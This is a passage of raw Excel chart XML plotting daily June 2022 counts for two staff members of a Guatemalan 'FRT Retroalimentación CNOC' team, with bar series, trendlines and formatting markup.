Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="sharedStrings.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item12.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IS ACUMULADO - ACTUALIZACION_CLIENTE - JUNIO 2022 - FRT V2.xlsx]EQUIPO FRT RETROALIMENTACION!TablaDinámica1</c:name>
    <c:fmtId val="3"/>
  </c:pivotSource>
  <c:chart>
    <c:title>
      <c:tx>
        <c:rich>
          <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-GT" sz="2400"/>
              <a:t>Equipo FRT Retroalimentación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-GT" sz="2400"/>
              <a:t>CNOC</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:defRPr>
          </a:pPr>
          <a:endParaRPr lang="es-G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09587010654975E-2"/>
          <c:y val="0.19537835804431572"/>
          <c:w val="0.93021692288463942"/>
          <c:h val="0.44691918820510207"/>
        </c:manualLayout>
      </c:layout>
      <c:barChart>
        <c:barDir val="col"/>
        <c:grouping val="clustered"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'EQUIPO FRT RETROALIMENTACION'!$E$47:$E$48</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>odalis.cardenas</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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trendline>
            <c:spPr>
              <a:ln w="19050" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:trendlineType val="poly"/>
            <c:order val="6"/>
            <c:dispRSqr val="1"/>
            <c:dispEq val="1"/>
            <c:trendlineLbl>
              <c:layout>
                <c:manualLayout>
                  <c:x val="7.6058192092467881E-3"/>
                  <c:y val="0.4494180049817944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GT"/>
                </a:p>
              </c:txPr>
            </c:trendlineLbl>
          </c:trendline>
          <c:cat>
            <c:multiLvlStrRef>
              <c:f>'EQUIPO FRT RETROALIMENTACION'!$A$49:$D$73</c:f>
              <c:multiLvlStrCache>
                <c:ptCount val="22"/>
                <c:lvl>
                  <c:pt idx="0">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="1">
                    <c:v>JUE</c:v>
                  </c:pt>
                  <c:pt idx="2">
                    <c:v>VIE</c:v>
                  </c:pt>
                  <c:pt idx="3">
                    <c:v>LUN</c:v>
                  </c:pt>
                  <c:pt idx="4">
                    <c:v>MAR</c:v>
                  </c:pt>
                  <c:pt idx="5">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="6">
                    <c:v>JUE</c:v>
                  </c:pt>
                  <c:pt idx="7">
                    <c:v>VIE</c:v>
                  </c:pt>
                  <c:pt idx="8">
                    <c:v>LUN</c:v>
                  </c:pt>
                  <c:pt idx="9">
                    <c:v>MAR</c:v>
                  </c:pt>
                  <c:pt idx="10">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="11">
                    <c:v>JUE</c:v>
                  </c:pt>
                  <c:pt idx="12">
                    <c:v>VIE</c:v>
                  </c:pt>
                  <c:pt idx="13">
                    <c:v>LUN</c:v>
                  </c:pt>
                  <c:pt idx="14">
                    <c:v>MAR</c:v>
                  </c:pt>
                  <c:pt idx="15">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="16">
                    <c:v>JUE</c:v>
                  </c:pt>
                  <c:pt idx="17">
                    <c:v>VIE</c:v>
                  </c:pt>
                  <c:pt idx="18">
                    <c:v>LUN</c:v>
                  </c:pt>
                  <c:pt idx="19">
                    <c:v>MAR</c:v>
                  </c:pt>
                  <c:pt idx="20">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="21">
                    <c:v>JUE</c:v>
                  </c:pt>
                </c:lvl>
                <c:lvl>
                  <c:pt idx="0">
                    <c:v>1</c:v>
                  </c:pt>
                  <c:pt idx="1">
                    <c:v>2</c:v>
                  </c:pt>
                  <c:pt idx="2">
                    <c:v>3</c:v>
                  </c:pt>
                  <c:pt idx="3">
                    <c:v>6</c:v>
                  </c:pt>
                  <c:pt idx="4">
                    <c:v>7</c:v>
                  </c:pt>
                  <c:pt idx="5">
                    <c:v>8</c:v>
                  </c:pt>
                  <c:pt idx="6">
                    <c:v>9</c:v>
                  </c:pt>
                  <c:pt idx="7">
                    <c:v>10</c:v>
                  </c:pt>
                  <c:pt idx="8">
                    <c:v>13</c:v>
                  </c:pt>
                  <c:pt idx="9">
                    <c:v>14</c:v>
                  </c:pt>
                  <c:pt idx="10">
                    <c:v>15</c:v>
                  </c:pt>
                  <c:pt idx="11">
                    <c:v>16</c:v>
                  </c:pt>
                  <c:pt idx="12">
                    <c:v>17</c:v>
                  </c:pt>
                  <c:pt idx="13">
                    <c:v>20</c:v>
                  </c:pt>
                  <c:pt idx="14">
                    <c:v>21</c:v>
                  </c:pt>
                  <c:pt idx="15">
                    <c:v>22</c:v>
                  </c:pt>
                  <c:pt idx="16">
                    <c:v>23</c:v>
                  </c:pt>
                  <c:pt idx="17">
                    <c:v>24</c:v>
                  </c:pt>
                  <c:pt idx="18">
                    <c:v>27</c:v>
                  </c:pt>
                  <c:pt idx="19">
                    <c:v>28</c:v>
                  </c:pt>
                  <c:pt idx="20">
                    <c:v>29</c:v>
                  </c:pt>
                  <c:pt idx="21">
                    <c:v>30</c:v>
                  </c:pt>
                </c:lvl>
                <c:lvl>
                  <c:pt idx="0">
                    <c:v>6</c:v>
                  </c:pt>
                </c:lvl>
                <c:lvl>
                  <c:pt idx="0">
                    <c:v>2022</c:v>
                  </c:pt>
                </c:lvl>
              </c:multiLvlStrCache>
            </c:multiLvlStrRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'EQUIPO FRT RETROALIMENTACION'!$E$49:$E$73</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="22"/>
                <c:pt idx="0">
                  <c:v>104</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>95</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>92</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>83</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>100</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>90</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>74</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>83</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>87</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>91</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>92</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>78</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>90</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>107</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>85</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>70</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>90</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>74</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>68</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>80</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-6D56-4099-9B21-68F6087A67F2}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'EQUIPO FRT RETROALIMENTACION'!$F$47:$F$48</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>veronicar.vasquez</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>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trendline>
            <c:spPr>
              <a:ln w="19050" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:trendlineType val="poly"/>
            <c:order val="6"/>
            <c:dispRSqr val="1"/>
            <c:dispEq val="1"/>
            <c:trendlineLbl>
              <c:layout>
                <c:manualLayout>
                  <c:x val="5.3613928361763317E-3"/>
                  <c:y val="0.5455057313262848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s-GT"/>
                </a:p>
              </c:txPr>
            </c:trendlineLbl>
          </c:trendline>
          <c:cat>
            <c:multiLvlStrRef>
              <c:f>'EQUIPO FRT RETROALIMENTACION'!$A$49:$D$73</c:f>
              <c:multiLvlStrCache>
                <c:ptCount val="22"/>
                <c:lvl>
                  <c:pt idx="0">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="1">
                    <c:v>JUE</c:v>
                  </c:pt>
                  <c:pt idx="2">
                    <c:v>VIE</c:v>
                  </c:pt>
                  <c:pt idx="3">
                    <c:v>LUN</c:v>
                  </c:pt>
                  <c:pt idx="4">
                    <c:v>MAR</c:v>
                  </c:pt>
                  <c:pt idx="5">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="6">
                    <c:v>JUE</c:v>
                  </c:pt>
                  <c:pt idx="7">
                    <c:v>VIE</c:v>
                  </c:pt>
                  <c:pt idx="8">
                    <c:v>LUN</c:v>
                  </c:pt>
                  <c:pt idx="9">
                    <c:v>MAR</c:v>
                  </c:pt>
                  <c:pt idx="10">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="11">
                    <c:v>JUE</c:v>
                  </c:pt>
                  <c:pt idx="12">
                    <c:v>VIE</c:v>
                  </c:pt>
                  <c:pt idx="13">
                    <c:v>LUN</c:v>
                  </c:pt>
                  <c:pt idx="14">
                    <c:v>MAR</c:v>
                  </c:pt>
                  <c:pt idx="15">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="16">
                    <c:v>JUE</c:v>
                  </c:pt>
                  <c:pt idx="17">
                    <c:v>VIE</c:v>
                  </c:pt>
                  <c:pt idx="18">
                    <c:v>LUN</c:v>
                  </c:pt>
                  <c:pt idx="19">
                    <c:v>MAR</c:v>
                  </c:pt>
                  <c:pt idx="20">
                    <c:v>MIÉ</c:v>
                  </c:pt>
                  <c:pt idx="21">
                    <c:v>JUE</c:v>
                  </c:pt>
                </c:lvl>
                <c:lvl>
                  <c:pt idx="0">
                    <c:v>1</c:v>
                  </c:pt>
                  <c:pt idx="1">
                    <c:v>2</c:v>
                  </c:pt>
                  <c:pt idx="2">
                    <c:v>3</c:v>
                  </c:pt>
                  <c:pt idx="3">
                    <c:v>6</c:v>
                  </c:pt>
                  <c:pt idx="4">
                    <c:v>7</c:v>
                  </c:pt>
                  <c:pt idx="5">
                    <c:v>8</c:v>
                  </c:pt>
                  <c:pt idx="6">
                    <c:v>9</c:v>
                  </c:pt>
                  <c:pt idx="7">
                    <c:v>10</c:v>
                  </c:pt>
                  <c:pt idx="8">
                    <c:v>13</c:v>
                  </c:pt>
                  <c:pt idx="9">
                    <c:v>14</c:v>
                  </c:pt>
                  <c:pt idx="10">
                    <c:v>15</c:v>
                  </c:pt>
                  <c:pt idx="11">
                    <c:v>16</c:v>
                  </c:pt>
                  <c:pt idx="12">
                    <c:v>17</c:v>
                  </c:pt>
                  <c:pt idx="13">
                    <c:v>20</c:v>
                  </c:pt>
                  <c:pt idx="14">
                    <c:v>21</c:v>
                  </c:pt>
                  <c:pt idx="15">
                    <c:v>22</c:v>
                  </c:pt>
                  <c:pt idx="16">
                    <c:v>23</c:v>
                  </c:pt>
                  <c:pt idx="17">
                    <c:v>24</c:v>
                  </c:pt>
                  <c:pt idx="18">
                    <c:v>27</c:v>
                  </c:pt>
                  <c:pt idx="19">
                    <c:v>28</c:v>
                  </c:pt>
                  <c:pt idx="20">
                    <c:v>29</c:v>
                  </c:pt>
                  <c:pt idx="21">
                    <c:v>30</c:v>
                  </c:pt>
                </c:lvl>
                <c:lvl>
                  <c:pt idx="0">
                    <c:v>6</c:v>
                  </c:pt>
                </c:lvl>
                <c:lvl>
                  <c:pt idx="0">
                    <c:v>2022</c:v>
                  </c:pt>
                </c:lvl>
              </c:multiLvlStrCache>
            </c:multiLvlStrRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'EQUIPO FRT RETROALIMENTACION'!$F$49:$F$73</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="22"/>
                <c:pt idx="0">
                  <c:v>79</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>81</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>67</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>80</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>78</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>83</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>83</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>60</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>64</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>71</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>65</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>64</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>55</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>63</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>64</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>79</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>64</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>47</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>57</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>69</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>52</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>63</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-6D56-4099-9B21-68F6087A67F2}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="216436256"/>
        <c:axId val="216453120"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="216436256"/>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title>
          <c:tx>
            <c:rich>
              <a:bodyPr rot="0" 